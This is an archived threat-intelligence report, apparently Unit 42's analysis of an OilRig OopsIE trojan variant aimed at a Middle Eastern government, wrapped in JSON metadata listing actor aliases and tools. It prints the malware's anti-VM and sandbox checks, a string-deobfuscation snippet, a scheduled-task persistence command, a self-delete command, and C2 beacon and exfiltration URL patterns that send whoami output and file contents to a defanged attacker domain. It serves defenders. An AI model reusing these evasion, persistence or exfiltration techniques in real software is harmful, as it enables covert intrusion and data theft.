{ "id": "48792266-675d-4b24-bd32-3b33f21418ba", "created_at": "2026-04-06T01:29:14.357991Z", "updated_at": "2026-04-10T03:37:36.976461Z", "deleted_at": null, "sha1_hash": "86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1", "title": "OilRig targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 579130, "plain_text": "OilRig targets a Middle Eastern Government and Adds Evasion\r\nTechniques to OopsIE\r\nBy Robert Falcone, Bryan Lee, Riley Porter\r\nPublished: 2018-09-04 · Archived: 2026-04-06 01:07:49 UTC\r\nThe OilRig group maintains their persistent attacks against government entities in the Middle East region using\r\npreviously identified tools and tactics. As observed in previous attack campaigns, the tools used are not an exact\r\nduplicate of the previous attack and instead is an iterative variant. In this instance a spear phishing email was used\r\ncontaining a lure designed to socially engineer and entice the victim to executing a malicious attachment. The\r\nattachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of\r\nOopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems.\r\n  Attack Details\r\nIn July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle\r\nEastern government agency. During that wave, we also observed OilRig leveraging additional compromised email\r\naccounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the\r\npayload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation\r\nstate, though a different organization than the one targeted delivering QUADAGENT. The email subject was in\r\nArabic, which translated to “Business continuity management training”. The email was sent to an address\r\nbelonging to a user group, rather than a specific individual’s email address. Based on open source data collection,\r\nit appears the targeted group had publicly published several documents regarding business continuity management\r\non the Internet, indicating the lures were purposefully crafted for this specific attack.\r\n  Evasion Techniques\r\nThe OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox\r\nchecks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its\r\nfunctional code. These evasion techniques are meant to thwart automated analysis in an effort to avoid detection.\r\nTechnique Description\r\nFan Check\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_Fan\r\n  According to MSDN, this query should return a class that provides statistics on the CPU\r\nfan. The Trojan checks to see if the result of this query returned a class with more than 0\r\nelements, which would most likely be true in a non-virtual environment.\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 1 of 8\n\nTemperature\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  SELECT * FROM MSAcpi_ThermalZoneTemperature\r\n  The Trojan will specifically attempt to get the CurrentTemperature value from this object\r\nand will check to see if the attempt results in an error that contains the word supported. This\r\nis meant to find the result of Not supported, which is the result if run in a virtual machine.\r\nMouse\r\nPointer\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_PointingDevice\r\n  The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer\r\nand Name fields in the results for the string VMware, Virtual, VBox, VM or Oracle.\r\nHard Disk\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_DiskDrive\r\n  The Trojan will check the Caption and Model fields in the results for the strings Virtual,\r\nVMWare, VM, VBox or Oracle.\r\nMotherboard\r\nCheck\r\nThe Trojan will perform the following WMI query:\r\n  Select * from Win32_BaseBoard\r\n  The Trojan will check the Manufacturer and Product fields in the results for the strings\r\nVMware, Virtual, VBox, VM or Oracle.\r\nSandboxie\r\nDLL Check\r\nThe Trojan will attempt to load the SbieDll.dll module via LoadLibrary.\r\nVBox DLL\r\nCheck\r\nThe Trojan checks to see if the file vboxmrxnp.dll exists in the system directory.\r\nVMware\r\nDLL Check\r\nThe Trojan checks to see if the files vmGuestLib.dll or vmbusres.dll exist in the system\r\ndirectory.\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 2 of 8\n\nTimezone\r\nCheck\r\nThe Trojan check to see if the system is configured (“DaylightName”) with one of the\r\nfollowing time zones:\r\n  Arabic Daylight Time (UTC+3)\r\nArab Daylight Time (UTC+3)\r\nArabian Daylight Time (UTC+4)\r\nMiddle East Daylight Time (UTC+2)\r\nIran Daylight Time (UTC+3.5)\r\nHuman\r\nInteraction\r\nCheck\r\nBefore executing its functional code, the Trojan presents a dialog box with the following line\r\nof code:\r\n  Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3),\r\nMsgBoxStyle.Critical, null);\r\n  This dialog box displays  An error occurred while processing user32.dll!, which the user\r\nmust click the ok button for the Trojan to run its functional code.\r\nTable 1 List of anti-vm and anti-sandbox techniques used by OopsIE\r\n  Most of these evasion techniques have been observed in other malware families; however, a few of the\r\ntechniques were more novel. First, we had not seen the CPU fan check used before, and upon testing the WMI\r\nquery in a VMware Windows 7 virtual machine we saw no result, as seen in Figure 1\r\nFigure 1 WMI query for the Win32_Fan class on a VM returning no statistics\r\nHowever, when we ran the same query in a physical system running Windows 7, we saw the contents of the\r\nWin32_Fan class, as seen in Figure 2. The OopsIE payload checks to see if the result of this query as more than 0\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 3 of 8\n\nelements to determine if it is running on a virtual machine.\r\nFigure 2 WMI query for Win32_Fan run on a physical system showing statistics\r\nSecondly, the CPU temperature check seen in this payload was previously used by GravityRAT, as discussed\r\nearlier this year by security researchers at Talos. They noted that while virtual machines were detected by this\r\ntechnique, some physical systems were also detected as virtual machines because they did not support the WMI\r\nquery. This suggests that other WMI-based VM detection techniques may also detect certain physical systems if\r\nthose systems do not support the specific WMI query.\r\nThe last technique that was particularly interesting is the time zone check, as the Trojan will not execute its\r\nfunctional code if the system does not have a specific time zone set. The Trojan compares the\r\nTimeZone.CurrentTimeZone.DaylightName property to strings Iran, Arab, Arabia and Middle East, which will\r\nmatch the following time zones in Windows:\r\n  Arabic Daylight Time (UTC+3)\r\nArab Daylight Time (UTC+3)\r\nArabian Daylight Time (UTC+4)\r\nMiddle East Daylight Time (UTC+2)\r\nIran Daylight Time (UTC+3.5)\r\nAccording to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as\r\nseen in Figure 3. The fact that the Trojan will not operate on systems that are not configured with these time zones\r\nsuggests that this is a highly targeted attack focused on a specific subset of target nations.\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 4 of 8\n\nFigure 3 Countries in which OopsIE will run in based on the time zone\r\nNotable Differences\r\nThe OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant\r\ndiscussed in our previous blog. The main similarities include the use of a scheduled task to persistently execute on\r\nthe system, as well as the same general process to communicate with its C2 server. For instance, this Trojan uses\r\nthe InternetExplorer application object much like the previous OopsIE Trojan and a very similar sequence of\r\nrequests to obtain commands. Also, this version of the Trojan inspects HTTP responses from the C2 server for the\r\ntags \u003cpre\u003e and \u003c/pre\u003e and will parse that data for commands.\r\nHowever, there are many differences introduced to this version of OopsIE from the previously discussed variant.\r\nAt face value, this current variant of OopsIE has a vast majority of its strings obfuscated, which can be\r\ndeobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer,\r\nsubtracting one from each integer and converting each into a character. The following code snippet was used to\r\ndecode strings within OopsIE:\r\n1\r\n2\r\n3\r\nout = \"\"\r\nfor e in obfuscated_string.split(\"-\"):\r\n   out += chr(int(e)-1)\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 5 of 8\n\nWhen first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as\r\ndiscussed in the previous section. The last check requires the user to click the ‘Ok’ button in an error dialog box,\r\nas seen in Figure 4.\r\nFigure 4 Error dialog box displayed by OopsIE\r\nAfter displaying the error dialog box, the Trojan will sleep for two seconds by running the following command\r\nthat runs the choice application. The use of the choice command, as seen below, did not appear in previous\r\nversions of OopsIE and appears to have been added in the most recent version used in this attack.\r\ncmd.exe /C choice /C Y /N /D Y /T 2 \u0026 Del\r\nAfter sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves\r\nitself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and\r\nsystem flags to hide them from the user.\r\nWith the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs\r\npersistently. The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain\r\nthe command to create the scheduled task and the VBScript to run. The decoded string from the Sch resource is:\r\nSchTasks /Create /SC MINUTE /MO 3 /TN \"%n%\" /TR \"wscript %path%\" /f\r\nThe decoded string from the VBS resource is:\r\nCreateObject(\"WScript.Shell\").Run(\"%app%\")\r\nThe %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin. This differs\r\nfrom the previous OopsIE variant that used a hardcoded task name for the scheduled task. The %path% string in\r\nthe scheduled task command will be replaced with the path to the following:\r\n%APPDATA%\\Windows\\ShwDoc.VBS\r\nThe decoded string from the VBS resource is written to ShwDoc.VBS. The %app% string in the VBScript is\r\nreplaced with %APPDATA%\\Windows\\WindowsImplantment.exe. This process ultimately attempts to run the\r\nTrojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a\r\nmain loop to continue its execution.\r\nAfter creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The\r\nprocess in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we\r\ndiscussed in our previous blog. This particular sample uses the following domain as its C2 server:\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 6 of 8\n\nwww.windowspatch[.]com\r\nOne obvious difference between this version of OopsIE compared to the previously analyzed version is the strings\r\nin the C2 URLs are reversed, from chk to khc, what to tahw and resp to pser. Also, the oops string used to signify\r\nand erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. Also, this variant of\r\nOopsIE uses the output of the whoami command as the parameter within the URL when communicating with the\r\nC2 server, which differs from the previous OopsIE variant that used the hostname and username from the\r\nenvironment variables. The C2 communications begins with a beacon to the following URL:\r\nhxxp://www.windowspatch[.]com/khc?\u003chex(STDOUT of whoami command)\u003e\r\nIf the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command\r\nresults sent by the Trojan to the C2 in the URL. If the Trojan receives this echo, it will create the following file\r\nthat the Trojan uses as a signal that it was able to successfully communicate with its C2 server:\r\n%APPDATA%\\Windows\\ShwDoc.srv\r\nIf the Trojan determines the C2 server wishes to send a command, it sends an HTTP request to the following URL:\r\nhxxp://www.windowspatch[.]com/tahw?\u003chex(STDOUT of whoami command)\u003e\r\nThe Trojan will first check the response to this request for the string spoo, which signifies the C2 does not wish to\r\nissue a command. Otherwise, the Trojan will attempt to parse the response for a command, specifically by\r\nsplitting the decode response on \u003c\u003e and treating the text to the left of the \u003c\u003e string as the command the text to the\r\nright as the command arguments. The command handler in this OopsIE variant is very similar to the previous\r\nversion, as it contains the same three (1, 2 and 3) commands seen in Table 2. The one difference in this command\r\nhandler from the previous version is the boom! command, which allows the actor to uninstall the OopsIE Trojan\r\nfrom the system.\r\nCommand Description\r\n1\r\nRuns a supplied command and writes it output to %APPDATA%\\SchWin.vbs, which will then\r\nbe uploaded to the C2 server.\r\n2\r\nDownloads a file to the system. Splits argument on \"(|)\", with the string to the left representing\r\nthe filename to save and the string to the right representing the data to write to the file.\r\n3 Read specified file and uploads its contents to the C2 server.\r\nboom!\r\nDeletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose\r\nname a GUID stored in the GID.bin file.\r\nTable 2 OopsIE commands\r\nWhen sending data to the C2 server after running commands, the Trojan will use the following URL structure with\r\neither BBY or BBZ splitting the whoami output and the exfiltrated data:\r\nhttp://www.windowspatch.com/pser?\u003chex(STDOUT of whoami command)(BBZ|BBY)hex(up to 1000 bytes of\r\nhexadecimal data)\u003e\r\n  Conclusion\r\nThe OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add\r\ncapabilities to their tools while still functionally using the same tactics over and over again. Within the time frame\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 7 of 8\n\nwe have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found\r\nfunctionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication\r\nto their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary\r\nis highly resourceful and continues to adapt over time. However, the tactics they continue to deploy are generally\r\nunsophisticated, and simple security hygiene would help organizations protect themselves against this threat.\r\nPalo Alto Networks customers are protected from this OilRig attack campaign and OopsIE by:\r\nAutoFocus customers can track this Trojan with the OopsIE tag\r\nAll known OopsIE samples are marked with malicious verdicts in WildFire\r\nAll known OopsIE C2 domains have DNS signatures and are classified as Command and Control\r\n \r\nIndicators of Compromise\r\nOopsIE Trojan\r\n36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23\r\n055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9\r\n6b240178eedba4ebc9f1c8b56bac02676ce896e609577f4fb64fa977d67c0761\r\n9e8ec04e534db1e714159cc68891be454c2459f179ab1df27d7f89d2b6793b17\r\nOopsIE C2\r\ndefender-update[.]com\r\nwindowspatch[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsi\r\ne/\r\nhttps://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/\r\nPage 8 of 8\n\nFigure 1 WMI However, when query for the Win32_Fan we ran the same class on query in a physical a VM returning system running no statistics Windows 7, we saw the contents of the\nWin32_Fan class, as seen in Figure 2. The OopsIE payload checks to see if the result of this query as more than 0\n Page 3 of 8 \n\nMiddle East Iran Daylight Daylight Time Time (UTC+3.5) (UTC+2) \nAccording to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as\nseen in Figure 3. The fact that the Trojan will not operate on systems that are not configured with these time zones\nsuggests that this is a highly targeted attack focused on a specific subset of target nations. \n Page 4 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" ], "report_names": [ "unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie" ], "threat_actors": [ { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775438954, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.pdf", "text": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.txt", "img": "https://archive.orkl.eu/86bb5f74b7211dd06cd5d7ced5aff04cbafc94b1.jpg" } }